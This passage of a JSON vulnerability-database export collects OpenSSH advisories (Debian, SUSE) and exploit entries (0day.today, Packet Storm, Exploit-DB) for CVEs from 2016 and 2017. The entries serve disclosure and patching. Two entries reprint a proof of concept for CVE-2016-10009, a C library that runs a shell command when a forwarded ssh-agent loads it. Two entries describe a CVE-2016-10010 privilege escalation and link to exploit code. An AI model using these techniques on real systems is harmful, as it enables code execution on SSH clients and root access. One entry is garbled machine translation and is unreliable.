realloc on buffer contents. This may allow local users to\n obtain sensitive private-key information by leveraging access to a\n privilege-separated child process.\n\nCVE-2016-10012\n\n Guido Vranken discovered that the OpenSSH shared memory manager\n did not ensure that a bounds check was enforced by all compilers,\n which could allow local users to gain privileges by leveraging access\n to a sandboxed privilege-separation process.\n\nCVE-2016-10708\n\n NULL pointer dereference and daemon crash via an out-of-sequence\n NEWKEYS message.\n\nCVE-2017-15906\n\n Michal Zalewski reported that OpenSSH improperly prevent write\n operations in readonly mode, allowing attackers to create zero-length\n files.\n\nFor Debian 8 "Jessie", these problems have been fixed in version\n1:6.7p1-5+deb8u6.\n\nWe recommend that you upgrade your openssh packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\n", "edition": 10, "modified": "2018-09-10T08:45:03", "published": "2018-09-10T08:45:03", "id": "DEBIAN:DLA-1500-1:E6BD7", "href": "https://lists.debian.org/debian-lts-announce/2018/debian-lts-announce-201809/msg00010.html", "title": "[SECURITY] [DLA 1500-1] openssh security update", "type": "debian", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:C"}}, {"lastseen": "2019-05-30T02:22:45", "bulletinFamily": "unix", "cvelist": ["CVE-2016-10708"], "description": "Package : openssh\nVersion : 1:6.0p1-4+deb7u7\nCVE ID : CVE-2016-10708\n\nOpenSSH was found to be vulnerable to out of order NEWKEYS messages\nwhich could crash the daemon, resulting in a denial of service attack.\n\nFor Debian 7 "Wheezy", these problems have been fixed in version\n1:6.0p1-4+deb7u7.\n\nWe recommend that you upgrade your openssh packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\n", "edition": 3, "modified": "2018-01-26T21:13:31", "published": "2018-01-26T21:13:31", "id": "DEBIAN:DLA-1257-1:E0ED4", "href": "https://lists.debian.org/debian-lts-announce/2018/debian-lts-announce-201801/msg00031.html", "title": "[SECURITY] [DLA 1257-1] openssh security update", "type": "debian", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "suse": [{"lastseen": "2018-07-30T13:53:39", "bulletinFamily": "unix", "cvelist": ["CVE-2016-10708"], "description": "This update for openssh fixes the following issues:\n\n Security issue fixed:\n\n - CVE-2016-10708: Prevent DoS due to crashes caused by out-of-sequence\n NEWKEYS message (bsc#1076957).\n\n This update was imported from the SUSE:SLE-12-SP2:Update update project.\n\n", "edition": 1, "modified": "2018-07-28T16:03:16", "published": "2018-07-28T16:03:16", "id": "OPENSUSE-SU-2018:2128-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2018-07/msg00045.html", "title": "Security update for openssh (moderate)", "type": "suse", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "zdt": [{"lastseen": "2018-01-01T07:13:54", "description": "Exploit for linux platform in category local exploits", "edition": 1, "published": "2016-12-23T00:00:00", "type": "zdt", "title": "OpenSSH 7.4 - UsePrivilegeSeparation Disabled Forwarded Unix Domain Sockets Privilege Escalation Exp", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-10010"], "modified": "2016-12-23T00:00:00", "href": "https://0day.today/exploit/description/26577", "id": "1337DAY-ID-26577", "sourceData": "Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1010\r\n \r\nThis issue affects OpenSSH if privilege separation is disabled (config option\r\nUsePrivilegeSeparation=no). While privilege separation is enabled by default, it\r\nis documented as a hardening option, and therefore disabling it should not\r\ndirectly make a system vulnerable.\r\n \r\nOpenSSH can forward TCP sockets and UNIX domain sockets. If privilege separation\r\nis disabled, then on the server side, the forwarding is handled by a child of\r\nsshd that has root privileges. For TCP server sockets, sshd explicitly checks\r\nwhether an attempt is made to bind to a low port (below IPPORT_RESERVED) and, if\r\nso, requires the client to authenticate as root. However, for UNIX domain\r\nsockets, no such security measures are implemented.\r\n \r\nThis means that, using \"ssh -L\", an attacker who is permitted to log in as a\r\nnormal user over SSH can effectively connect to non-abstract unix domain sockets\r\nwith root privileges. On systems that run systemd, this can for example be\r\nexploited by asking systemd to add an LD_PRELOAD environment variable for all\r\nfollowing daemon launches and then asking it to restart cron or so. The attached\r\nexploit demonstrates this - if it is executed on a system with systemd where\r\nthe user is allowed to ssh to his own account and where privsep is disabled, it\r\nyields a root shell.\r\n \r\n \r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40962.zip\n\n# 0day.today [2018-01-01] #", "sourceHref": "https://0day.today/exploit/26577", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-04T03:40:01", "description": "The OpenSSH agent permits its clients to load PKCS11 providers using the commands SSH_AGENTC_ADD_SMARTCARD_KEY and SSH_AGENTC_ADD_SMARTCARD_KEY_CONSTRAINED if OpenSSH was compiled with the ENABLE_PKCS11 flag (normally enabled) and the agent isn't locked. For these commands, the client has to specify a provider name. Th e agent passes this provider name to a subprocess (via ssh-agent.c:process_add_smartcard_key -> ssh-pkcs11-client.c:pkcs11_add_provider -> ssh-pkcs11-client.c:s end_msg), and the subprocess receives it and passes it to dlopen() (via ssh-pkcs 11-helper.c:process -> ssh-pkcs11-helper.c:process_add -> ssh-pkcs11.c:pkcs11_ad d_provider -> dlopen). No checks are performed on the provider name, apart from testing whether that provider is already loaded. This means that, if a user connects to a malicious SSH server with agent forwarding enabled and the malicious server has the ability to place a file with attacker-controlled contents in the victim's filesystem, the SSH server can execute code on the user's machine.", "edition": 1, "published": "2016-12-23T00:00:00", "title": "OpenSSH 7.4 - agent Protocol Arbitrary Library Loading Vulnerability", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-10009"], "modified": "2016-12-23T00:00:00", "href": "https://0day.today/exploit/description/26576", "id": "1337DAY-ID-26576", "sourceData": "OpenSSH < 7.4 - agent Protocol Arbitrary Library Loading\r\n\r\nOpenSSH: agent protocol permits loading arbitrary libraries \r\n\r\nCVE-2016-10009\r\n\r\n\r\nThe OpenSSH agent permits its clients to load PKCS11 providers using the commands SSH_AGENTC_ADD_SMARTCARD_KEY and SSH_AGENTC_ADD_SMARTCARD_KEY_CONSTRAINED if OpenSSH was compiled with the ENABLE_PKCS11 flag (normally enabled) and the agent isn't locked. For these commands, the client has to specify a provider name. The agent passes this provider name to a subprocess (via ssh-agent.c:process_add_smartcard_key -> ssh-pkcs11-client.c:pkcs11_add_provider -> ssh-pkcs11-client.c:send_msg), and the subprocess receives it and passes it to dlopen() (via ssh-pkcs11-helper.c:process -> ssh-pkcs11-helper.c:process_add -> ssh-pkcs11.c:pkcs11_add_provider -> dlopen). No checks are performed on the provider name, apart from testing whether that provider is already loaded.\r\n\r\nThis means that, if a user connects to a malicious SSH server with agent forwarding enabled and the malicious server has the ability to place a file with attacker-controlled contents in the victim's filesystem, the SSH server can execute code on the user's machine.\r\n\r\nTo reproduce the issue, first create a library that executes some command when it is loaded:\r\n\r\n$ cat evil_lib.c\r\n#include <stdlib.h>\r\n__attribute__((constructor)) static void run(void) {\r\n // in case you're loading this via LD_PRELOAD or LD_LIBRARY_PATH,\r\n // prevent recursion through system()\r\n unsetenv(\"LD_PRELOAD\");\r\n unsetenv(\"LD_LIBRARY_PATH\");\r\n system(\"id > /tmp/test\");\r\n}\r\n$ gcc -shared -o evil_lib.so evil_lib.c -fPIC -Wall\r\n\r\nConnect to another machine using \"ssh -A\". Then, on the remote machine:\r\n\r\n$ ssh-add -s [...]/evil_lib.so\r\nEnter passphrase for PKCS#11: [just press enter here]\r\nSSH_AGENT_FAILURE\r\nCould not add card: [...]/evil_lib.so\r\n\r\nAt this point, the command \"id > /tmp/test\" has been executed on the machine running the ssh agent:\r\n\r\n$ cat /tmp/test\r\nuid=1000(user) gid=1000(user) groups=[...]\r\n\r\nThis bug is subject to a 90 day disclosure deadline. If 90 days elapse\r\nwithout a broadly available patch, then the bug report will automatically\r\nbecome visible to the public.\r\n\r\n\r\n\r\nFound by: Jann Horn\n\n# 0day.today [2018-04-04] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/26576"}], "myhack58": [{"lastseen": "2016-12-22T14:53:34", "bulletinFamily": "info", "cvelist": ["CVE-2016-10009"], "edition": 1, "description": "Vulnerability number\nCVE-2016-10009 \nVulnerability level\nIn the risk\nVulnerability\nOpenSSH 7.3 and the following version\nVulnerability description\nThe vulnerability appears the ssh-agent, this process by default does not start, only in a multi-host Free the password the login will only be used to. the sshd server can use the forwarded agent-socket file to trick the machine to the ssh-agent in the trusted white list path other than the load a malicious PKCS#11 module, arbitrary code execution. In other words, a malicious server on the client machine on the remote code execution. \nThis vulnerability of the Use Conditions are relatively harsh, requiring the attacker to control the forwarding agent-socket, and need to have the host file system write permissions. So the official put the vulnerability level rated as medium risk. Based on OpenSSH huge amount of users, there may be a small part of the host will be affected by this. \n! [](/Article/UploadPic/2016-12/20161221201553133. jpg? www. myhack58. com) \nBug fixes\nIn fact, only allows the loading of trusted white list module, you can solve the problem. OpenSSH official has to 12, on 19, released 7. 4 version of OpenSSH that fixes including CVE-2016-10009 including a plurality of Holes. Ubuntu, Debian, etc. the platform also has updated the program. Please timely to the latest version. \n! [](/Article/UploadPic/2016-12/20161221201553424. png? www. myhack58. com)\n", "modified": "2016-12-21T00:00:00", "published": "2016-12-21T00:00:00", "href": "http://www.myhack58.com/Article/html/3/62/2016/82311.htm", "id": "MYHACK58:62201682311", "type": "myhack58", "title": "OpenSSH is now in the risk of vulnerabilities can cause remote code execution-vulnerability warning-the black bar safety net", "cvss": {"score": 0.0, "vector": "NONE"}}], "packetstorm": [{"lastseen": "2016-12-23T22:03:13", "description": "", "published": "2016-12-23T00:00:00", "type": "packetstorm", "title": "OpenSSH Arbitrary Library Loading", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-10009"], "modified": "2016-12-23T00:00:00", "id": "PACKETSTORM:140261", "href": "https://packetstormsecurity.com/files/140261/OpenSSH-Arbitrary-Library-Loading.html", "sourceData": "`OpenSSH: agent protocol permits loading arbitrary libraries \n \nCVE-2016-10009 \n \n \nThe OpenSSH agent permits its clients to load PKCS11 providers using the commands SSH_AGENTC_ADD_SMARTCARD_KEY and SSH_AGENTC_ADD_SMARTCARD_KEY_CONSTRAINED if OpenSSH was compiled with the ENABLE_PKCS11 flag (normally enabled) and the agent isn't locked. For these commands, the client has to specify a provider name. The agent passes this provider name to a subprocess (via ssh-agent.c:process_add_smartcard_key -> ssh-pkcs11-client.c:pkcs11_add_provider -> ssh-pkcs11-client.c:send_msg), and the subprocess receives it and passes it to dlopen() (via ssh-pkcs11-helper.c:process -> ssh-pkcs11-helper.c:process_add -> ssh-pkcs11.c:pkcs11_add_provider -> dlopen). No checks are performed on the provider name, apart from testing whether that provider is already loaded. \n \nThis means that, if a user connects to a malicious SSH server with agent forwarding enabled and the malicious server has the ability to place a file with attacker-controlled contents in the victim's filesystem, the SSH server can execute code on the user's machine. \n \nTo reproduce the issue, first create a library that executes some command when it is loaded: \n \n$ cat evil_lib.c \n#include <stdlib.h> \n__attribute__((constructor)) static void run(void) { \n// in case you're loading this via LD_PRELOAD or LD_LIBRARY_PATH, \n// prevent recursion through system() \nunsetenv(\"LD_PRELOAD\"); \nunsetenv(\"LD_LIBRARY_PATH\"); \nsystem(\"id > /tmp/test\"); \n} \n$ gcc -shared -o evil_lib.so evil_lib.c -fPIC -Wall \n \nConnect to another machine using \"ssh -A\". Then, on the remote machine: \n \n$ ssh-add -s [...]/evil_lib.so \nEnter passphrase for PKCS#11: [just press enter here] \nSSH_AGENT_FAILURE \nCould not add card: [...]/evil_lib.so \n \nAt this point, the command \"id > /tmp/test\" has been executed on the machine running the ssh agent: \n \n$ cat /tmp/test \nuid=1000(user) gid=1000(user) groups=[...] \n \nThis bug is subject to a 90 day disclosure deadline. If 90 days elapse \nwithout a broadly available patch, then the bug report will automatically \nbecome visible to the public. \n \n \n \nFound by: Jann Horn \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/140261/GS20161223180758.txt"}], "exploitdb": [{"lastseen": "2016-12-23T21:58:38", "description": "OpenSSH < 7.4 - 'UsePrivilegeSeparation Disabled' Forwarded Unix Domain Sockets Privilege Escalation. CVE-2016-10010. Local exploit for Linux platform. Ta...", "published": "2016-12-23T00:00:00", "type": "exploitdb", "title": "OpenSSH < 7.4 - 'UsePrivilegeSeparation Disabled' Forwarded Unix Domain Sockets Privilege Escalation", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-10010", "CVE-2016-0778", "CVE-2016-0777"], "modified": "2016-12-23T00:00:00", "id": "EDB-ID:40962", "href": "https://www.exploit-db.com/exploits/40962/", "sourceData": "Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1010\r\n\r\nThis issue affects OpenSSH if privilege separation is disabled (config option\r\nUsePrivilegeSeparation=no). While privilege separation is enabled by default, it\r\nis documented as a hardening option, and therefore disabling it should not\r\ndirectly make a system vulnerable.\r\n\r\nOpenSSH can forward TCP sockets and UNIX domain sockets. If privilege separation\r\nis disabled, then on the server side, the forwarding is handled by a child of\r\nsshd that has root privileges. For TCP server sockets, sshd explicitly checks\r\nwhether an attempt is made to bind to a low port (below IPPORT_RESERVED) and, if\r\nso, requires the client to authenticate as root. However, for UNIX domain\r\nsockets, no such security measures are implemented.\r\n\r\nThis means that, using \"ssh -L\", an attacker who is permitted to log in as a\r\nnormal user over SSH can effectively connect to non-abstract unix domain sockets\r\nwith root privileges. On systems that run systemd, this can for example be\r\nexploited by asking systemd to add an LD_PRELOAD environment variable for all\r\nfollowing daemon launches and then asking it to restart cron or so. The attached\r\nexploit demonstrates this - if it is executed on a system with systemd where\r\nthe user is allowed to ssh to his own account and where privsep is disabled, it\r\nyields a root shell.\r\n\r\n\r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40962.zip\r\n", "cvss": {"score": 4.6, "vector": "AV:NETWORK/AC:HIGH/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/40962/"}]}
